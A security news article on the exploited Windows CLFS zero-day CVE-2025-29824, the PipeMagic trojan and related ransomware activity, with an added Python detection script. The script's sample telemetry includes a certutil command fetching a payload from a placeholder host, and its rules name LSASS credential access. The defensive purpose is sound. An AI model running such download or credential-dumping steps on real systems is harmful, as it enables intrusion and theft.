A recently discovered zero-day vulnerability in the Windows Common Log File System (CLFS) has been actively exploited in ransomware attacks using the PipeMagic Trojan, Microsoft has confirmed. This critical flaw, now patched, allowed threat actors to gain SYSTEM-level access and launch targeted cyberattacks across several global sectors.
High-Profile Targets Across Multiple Countries
The attackers set their sights on a narrow group of victims. According to Microsoft, targeted organizations included IT and real estate firms in the U.S., a financial institution in Venezuela, a Spanish software company, and a major retail business in Saudi Arabia. These attacks mark another wave of highly selective ransomware operations driven by privilege escalation tactics.
CVE-2025-29824: The Core of the Exploit
Tracked as CVE-2025-29824, the exploited bug is a privilege escalation flaw embedded in the CLFS kernel driver. It allowed attackers to obtain SYSTEM privileges—a crucial step in launching devastating ransomware campaigns. The vulnerability was patched in Microsoft’s April 2025 Patch Tuesday update. However, before the fix, the bug was exploited in the wild as part of an advanced attack chain.
Microsoft has attributed this threat activity to a group it tracks as Storm-2460. The attackers leveraged PipeMagic, a trojan that serves as both a delivery mechanism for the exploit and the ransomware payload.
Malware Delivery via Compromised Tools
While the precise method of initial access remains unclear, researchers noted that the attackers used the certutil command-line tool to download malware from a legitimate but compromised third-party website. The malware was delivered as an MSBuild project file with an encrypted payload that, once executed, launched the PipeMagic Trojan.
This sophisticated malware is plugin-based and modular, and has been in circulation since at least 2022. It is capable of deploying various post-exploitation tools, including credential stealers and ransomware.
Repeated Use of PipeMagic in Zero-Day Attacks
This isn’t the first time PipeMagic has been tied to zero-day exploits. The same Trojan was previously used to deploy ransomware using CVE-2025-24983, a vulnerability in the Windows Win32 Kernel Subsystem, flagged by ESET and patched just last month. It also played a role in earlier attacks involving Nokoyawa ransomware, which exploited the 2023 zero-day flaw CVE-2023-28252—also within CLFS.
Security firm Kaspersky had previously noted that PipeMagic often arrives via MSBuild scripts and serves as a custom backdoor. This modular design gives attackers the flexibility to load additional malicious components on compromised systems.
Protection in Windows 11 Version 24H2
Fortunately, the most recent version of Windows 11 (24H2) is not affected by this specific exploit. That’s because it restricts access to sensitive System Information Classes within NtQuerySystemInformation to users with SeDebugPrivilege—a privilege typically reserved for administrators.
Microsoft’s Threat Intelligence team detailed how the exploit manipulates memory using the RtlSetAllBits API to overwrite the process token with 0xFFFFFFFF, effectively granting all privileges. This enables attackers to inject malicious code into SYSTEM-level processes.
After Gaining Access: Credential Theft and File Encryption
Once attackers elevate their privileges, they move quickly to extract user credentials by dumping the memory of LSASS (Local Security Authority Subsystem Service). From there, the ransomware component encrypts files using randomly generated extensions, making detection and recovery more difficult.
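As an added example (not code from the article or from Microsoft's report), the Python below flags the three observable stages of the chain described in the delivery section and in the paragraph above: certutil invoked with a URL, MSBuild handed a project file from a user-writable path, and a process outside System32 opening LSASS. The event records, host names, URL and file paths are constructed for the example, and the field names only loosely follow Sysmon process-creation and process-access events.

```python
from typing import List, Optional
from dataclasses import dataclass
import re

@dataclass
class ProcEvent:
    kind: str          # "create" (process creation) or "access" (process access)
    image: str         # image of the created process, or the source image for an access event
    cmdline: str = ""  # command line (create events only)
    target: str = ""   # target image (access events only)

URL_RE = re.compile(r"https?://", re.IGNORECASE)
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")

def stage_of(ev: ProcEvent) -> Optional[str]:
    """Name the stage of the described chain an event matches, or None."""
    img, cmd = ev.image.lower(), ev.cmdline.lower()
    if ev.kind == "create":
        # Stage 1: certutil invoked with a URL, i.e. used as a downloader.
        if img.endswith("\\certutil.exe") and URL_RE.search(cmd):
            return "certutil_download"
        # Stage 2: MSBuild handed a project file from a user-writable path.
        if img.endswith("\\msbuild.exe") and any(p in cmd for p in USER_WRITABLE):
            return "msbuild_user_path"
    elif ev.kind == "access":
        # Stage 3: LSASS opened by a process outside System32 (crude allow-list).
        if ev.target.lower().endswith("\\lsass.exe") and not img.startswith("c:\\windows\\system32\\"):
            return "lsass_access"
    return None

def detect(events: List[ProcEvent]) -> List[str]:
    """Return the distinct stages observed, in order of first appearance."""
    seen: List[str] = []
    for ev in events:
        stage = stage_of(ev)
        if stage and stage not in seen:
            seen.append(stage)
    return seen

# Constructed sample telemetry; the host, URL and file names are placeholders.
SAMPLE = [
    ProcEvent("create", r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f https://compromised.example/build.proj C:\Users\Public\build.proj"),
    ProcEvent("create", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\Public\build.proj"),
    ProcEvent("access", r"C:\Users\Public\svc.exe", target=r"C:\Windows\System32\lsass.exe"),
]

if __name__ == "__main__":
    print(detect(SAMPLE))  # prints ['certutil_download', 'msbuild_user_path', 'lsass_access']
```

The System32 allow-list for LSASS access is a deliberate simplification; production triage would also check the accessing process's signer and the requested access mask.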
Although Microsoft has not yet obtained a sample of the ransomware used, the ransom note left behind included a TOR address associated with the RansomEXX ransomware family—known for targeting enterprise networks with high-impact encryption attacks.
Post-Compromise Privilege Escalation: A Critical Threat Vector
Microsoft emphasized that exploits like CVE-2025-29824 are highly valuable to ransomware operators. By gaining privileged access after an initial compromise—often through commodity malware—they can execute lateral movement and mass ransomware deployment across an entire network.